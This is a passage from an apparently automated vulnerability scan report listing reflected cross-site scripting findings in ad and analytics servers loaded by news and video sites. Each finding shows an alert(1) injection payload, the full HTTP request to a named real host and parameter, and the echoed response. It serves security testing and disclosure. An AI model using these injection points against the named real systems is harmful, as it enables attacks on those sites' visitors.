P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 01 Nov 2011 02:13:58 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 4607

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?6607a"><script>alert(1)</script>fedfa55f3ca=1&Z=728x90&s=2300359&_salt=467812189&t=2" target="_parent">
...[SNIP]...

3.14. http://adnxs.revsci.net/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 825f5'-alert(1)-'bc1f7844b9a was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90825f5'-alert(1)-'bc1f7844b9a&s=1889588&r=1&_salt=501357491&u=http%3A%2F%2Fwww.politico.com%2Findex.html HTTP/1.1
Host: adnxs.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:42:37 GMT
Content-Length: 496

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90825f5'-alert(1)-'bc1f7844b9a&referrer=http://www.politico.com/index.html&inv_code=1889588&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90825f5%27-alert%281%29-%27bc1f7844b9
...[SNIP]...

3.15. http://adnxs.revsci.net/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76292'-alert(1)-'5914a4e1bc was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=188958876292'-alert(1)-'5914a4e1bc&r=1&_salt=501357491&u=http%3A%2F%2Fwww.politico.com%2Findex.html HTTP/1.1
Host: adnxs.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:42:46 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.politico.com/index.html&inv_code=188958876292'-alert(1)-'5914a4e1bc&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D188958876292%27-alert%281%29-%275914a4e1bc%26r%3D1%26_salt%3D501357491%26u%3Dhttp%253A%25
...[SNIP]...

3.16. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7417d<script>alert(1)</script>4dfdaf9fc1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7426977417d<script>alert(1)</script>4dfdaf9fc1e?d=3827355846744503244 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3827355846744503244&rnd=4482520784424853993&fpid=13&nu=n&t=&sp=n&purl=&ctid=1
Cookie: Apache="168296556x0.184+1312290886x-1235322650"; untarget=1

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Tue, 01 Nov 2011 02:17:59 GMT
Server: XPEHOTEHb/1.1
Content-Length: 78

Unsupported URL: /adserver/vdi/7426977417d<script>alert(1)</script>4dfdaf9fc1e

3.17. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 83e9a<script>alert(1)</script>69ceae6dc70 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1387828&pid=120176783e9a<script>alert(1)</script>69ceae6dc70&ps=-1&zw=588&zh=250&url=http%3A//www.politico.com/news/stories/1011/67294.html&v=5&dct=Herman%20Cain%27s%20story%20divides%20conservatives%20-%20Alexander%20Burns%20and%20Keach%20Hagey%20-%20POLITICO.com&ref=http%3A//www.politico.com/&metakw=2012%20Elections,Herman%20Cain,National%20Restaurant%20Association,Karl%20Rove,Rush%20Limbaugh HTTP/1.1
Host: ads.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/news/stories/1011/67294.html
Cookie: oo_flag=t; s_pers=%20s_getnr%3D1316296773437-New%7C1379368773437%3B%20s_nrgvo%3DNew%7C1379368773439%3B

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:30:51 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2529


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "120176783e9a<script>alert(1)</script>69ceae6dc70"

   
                                                           </head>
...[SNIP]...

3.18. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload c7df2--><script>alert(1)</script>aa10569b39e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1387828c7df2--><script>alert(1)</script>aa10569b39e&pid=1201767&ps=-1&zw=588&zh=250&url=http%3A//www.politico.com/news/stories/1011/67294.html&v=5&dct=Herman%20Cain%27s%20story%20divides%20conservatives%20-%20Alexander%20Burns%20and%20Keach%20Hagey%20-%20POLITICO.com&ref=http%3A//www.politico.com/&metakw=2012%20Elections,Herman%20Cain,National%20Restaurant%20Association,Karl%20Rove,Rush%20Limbaugh HTTP/1.1
Host: ads.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/news/stories/1011/67294.html
Cookie: oo_flag=t; s_pers=%20s_getnr%3D1316296773437-New%7C1379368773437%3B%20s_nrgvo%3DNew%7C1379368773439%3B

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:30:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Content-Length: 3420
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1387828c7df2--><script>alert(1)</script>aa10569b39e" -->
...[SNIP]...

3.19. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload ffb30--><script>alert(1)</script>338e101eb1d was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1387828&pid=1201767&ps=-1ffb30--><script>alert(1)</script>338e101eb1d&zw=588&zh=250&url=http%3A//www.politico.com/news/stories/1011/67294.html&v=5&dct=Herman%20Cain%27s%20story%20divides%20conservatives%20-%20Alexander%20Burns%20and%20Keach%20Hagey%20-%20POLITICO.com&ref=http%3A//www.politico.com/&metakw=2012%20Elections,Herman%20Cain,National%20Restaurant%20Association,Karl%20Rove,Rush%20Limbaugh HTTP/1.1
Host: ads.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/news/stories/1011/67294.html
Cookie: oo_flag=t; s_pers=%20s_getnr%3D1316296773437-New%7C1379368773437%3B%20s_nrgvo%3DNew%7C1379368773439%3B

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:31:03 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Content-Length: 3859
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1ffb30--><script>alert(1)</script>338e101eb1d" -->
   
...[SNIP]...

3.20. http://adserving.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c41c'-alert(1)-'5514d5e74be was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x2507c41c'-alert(1)-'5514d5e74be&section=1921728&referrer=http://www.politico.com/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:42:54 GMT
Content-Length: 446

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x2507c41c'-alert(1)-'5514d5e74be&inv_code=1921728&referrer=http://www.politico.com/index.html&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x2507c41c%27-alert
...[SNIP]...

3.21. http://adserving.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 841ee'-alert(1)-'b206036ced2 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1921728841ee'-alert(1)-'b206036ced2&referrer=http://www.politico.com/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:43:04 GMT
Content-Length: 446

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1921728841ee'-alert(1)-'b206036ced2&referrer=http://www.politico.com/index.html&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1921728841ee%27-al
...[SNIP]...

3.22. http://api.bizographics.com/v2/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 27705<script>alert(1)</script>7547e8e3a83 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/profile.redirect?api_key=1be3a6866fd64648a7b0c808e855170227705<script>alert(1)</script>7547e8e3a83&group_delimiter=,&industry_delimiter=,&functional_area_delimiter=,&callback_url=http://aud.pubmatic.com/AdServer/Artemis?dpid=7 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=27180&s=27181&a=22456
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 01 Nov 2011 01:32:29 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=fd834518-43c5-4956-b6b8-0539a9853af8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (1be3a6866fd64648a7b0c808e855170227705<script>alert(1)</script>7547e8e3a83)

3.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9c756<script>alert(1)</script>098041de254 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=79c756<script>alert(1)</script>098041de254&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:47 GMT
Date: Mon, 31 Oct 2011 19:04:47 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"79c756<script>alert(1)</script>098041de254", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.24. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 10d82<script>alert(1)</script>361b9bb5076 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=39&c4=53547&c5=31162&c6=&c10=5002310d82<script>alert(1)</script>361b9bb5076&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 15 Nov 2011 01:29:09 GMT
Date: Tue, 01 Nov 2011 01:29:09 GMT
Content-Length: 1248
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"39", c4:"53547", c5:"31162", c6:"", c10:"5002310d82<script>alert(1)</script>361b9bb5076", c15:"", c16:"", r:""});



3.25. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 8617f<script>alert(1)</script>a248be74c7f was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=8617f<script>alert(1)</script>a248be74c7f&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:55 GMT
Date: Mon, 31 Oct 2011 19:04:55 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"8617f<script>alert(1)</script>a248be74c7f", c16:"", r:""});



3.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fbe3c<script>alert(1)</script>bedb297f23f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888fbe3c<script>alert(1)</script>bedb297f23f&c3=2&c4=&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:49 GMT
Date: Mon, 31 Oct 2011 19:04:49 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888fbe3c<script>alert(1)</script>bedb297f23f", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f8430<script>alert(1)</script>d63b8fdb4e0 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2f8430<script>alert(1)</script>d63b8fdb4e0&c4=&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: UID=2695e1-80.67.74.150-1312230894; UIDR=1317850617

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 14 Nov 2011 19:04:51 GMT
Date: Mon, 31 Oct 2011 19:04:51 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2f8430<script>alert(1)</script>d63b8fdb4e0", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 3f385<script>alert(1)</script>943c461294 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=3f385<script>alert(1)</script>943c461294&c5=&c6=&c15=&tm=240654 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
